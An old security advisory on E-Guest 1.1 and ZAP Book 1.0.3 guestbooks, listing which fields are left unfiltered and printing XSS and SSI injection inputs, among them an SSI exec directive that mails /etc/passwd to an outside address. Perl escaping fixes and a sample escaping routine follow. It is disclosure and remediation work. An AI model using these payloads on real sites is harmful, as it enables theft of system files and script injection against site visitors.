1st Jul 2002 [SBWID-5497]
COMMAND
E-Guest & ZAP Book XSS and remote shell execution
SYSTEMS AFFECTED
E-Guest 1.1
ZAP Book v1.0.3
PROBLEM
From the DownBload Security Research Lab advisory:
It looks like it is very hard to find a secure guestbook. ;)
The E-Guest author wrote "HTML tag filtering". That is true, but only
'comment' is filtered; name, email, homepage and location are still
unfiltered, so we can put our nasty SSI or CSS code there.
ZAP Book is a different animal. In ZAP Book almost everything is
filtered. The exception is the 'post' variable, which contains the user
comment, so again we can put our nasty SSI or CSS code in the 'post' variable.
======[ Examples
---[ E-Guest
SSI attack
~~~~~~~~~~
Full Name: HI<!--#exec cmd="/bin/mail downbload@hotmail.com < /etc/passwd"-->
E-mail: downbload@hotmail.com
Homepage:
UIN:
Location: Beyond the light
Comment: Nothing special, just SSI attack.
CSS attack
~~~~~~~~~~
Full Name: HI<script>javascript:alert('HACKED BY DOWNBLOAD');</script>
E-mail: downbload@hotmail.com
Homepage:
UIN:
Location: Beyond the light
Comment: Nothing special, just CSS attack.
---[ ZAP Book
SSI attack
~~~~~~~~~~
Name: DownBload
Email: downbload@hotmail.com
Homepage:
Location:
AIM Screename:
MSN Email:
Yahoo! Screename:
ICQ Number:
Referred by: Search Engine
Entry: SSI attack <!--#exec cmd="/bin/mail downbload@hotmail.com < /etc/passwd"-->
CSS attack
~~~~~~~~~~
Name: DownBload
Email: downbload@hotmail.com
Homepage:
Location:
AIM Screename:
MSN Email:
Yahoo! Screename:
ICQ Number:
Referred by: Search Engine
Entry: CSS attack <script>javascript:alert('HACKED BY DOWNBLOAD');</script>
SOLUTION
---[ E-Guest
FIX: Add the following code to E-Guest_sign.pl (or wait for the fixed version :-):
...
# Escape angle brackets in every unfiltered field, not only in the comment,
# so that SSI directives and HTML tags are stored and displayed as plain text.
$fullname =~ s/</&lt;/g;
$fullname =~ s/>/&gt;/g;
$email =~ s/</&lt;/g;
$email =~ s/>/&gt;/g;
$homepage =~ s/</&lt;/g;
$homepage =~ s/>/&gt;/g;
$uin =~ s/</&lt;/g;
$uin =~ s/>/&gt;/g;
$location =~ s/</&lt;/g;
$location =~ s/>/&gt;/g;
...
---[ ZAP Book
FIX: Add the following code to addentry.cgi (or wait for the fixed version :-):
...
# Escape angle brackets in the one field ZAP Book leaves unfiltered.
$in{'post'} =~ s/</&lt;/g;
$in{'post'} =~ s/>/&gt;/g;
...
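As an added example covering both fixes above (my code, not E-Guest's or ZAP Book's; the field names and the sample entry are constructed), the same escaping written once as a routine that is applied to every field and also handles '&' and quotes, which the per-field substitutions above leave alone:

```perl
#!/usr/bin/perl
# Added example, not E-Guest or ZAP Book code: one escape routine applied
# to every guestbook field, in place of per-field '<' and '>' substitutions.
use strict;
use warnings;

# Order matters: '&' must be escaped first, otherwise the entities produced
# by the later substitutions would be turned into '&amp;lt;' and so on.
# Quotes are escaped as well, so a value written inside an HTML attribute
# (e.g. the homepage link) cannot break out of the attribute.
sub html_escape {
    my ($s) = @_;
    return '' unless defined $s;
    $s =~ s/&/&amp;/g;
    $s =~ s/</&lt;/g;
    $s =~ s/>/&gt;/g;
    $s =~ s/"/&quot;/g;
    $s =~ s/'/&#39;/g;
    return $s;
}

# Constructed sample entry, modelled on the advisory's examples; the
# e-mail address is a placeholder.
my %entry = (
    fullname => 'HI<!--#exec cmd="/bin/mail attacker@example.com < /etc/passwd"-->',
    email    => 'attacker@example.com',
    homepage => 'http://example.com/?a=1&b=2',
    uin      => '',
    location => 'Beyond the light',
    comment  => 'Nothing special <script>alert(1)</script>',
);

# Escape every field, not only the comment, before it is stored or rendered.
my %safe = map { ($_ => html_escape($entry{$_})) } keys %entry;

for my $field (sort keys %safe) {
    # No raw '<' may survive; an SSI directive or a tag needs one to start.
    die "$field still contains '<'" if $safe{$field} =~ /</;
    printf "%-9s %s\n", "$field:", $safe{$field};
}
```

Escaping on output is what neutralises both payloads: the SSI directive is only executed if the server sees a literal `<!--#exec` in the page it serves, and `&lt;!--#exec` is just text.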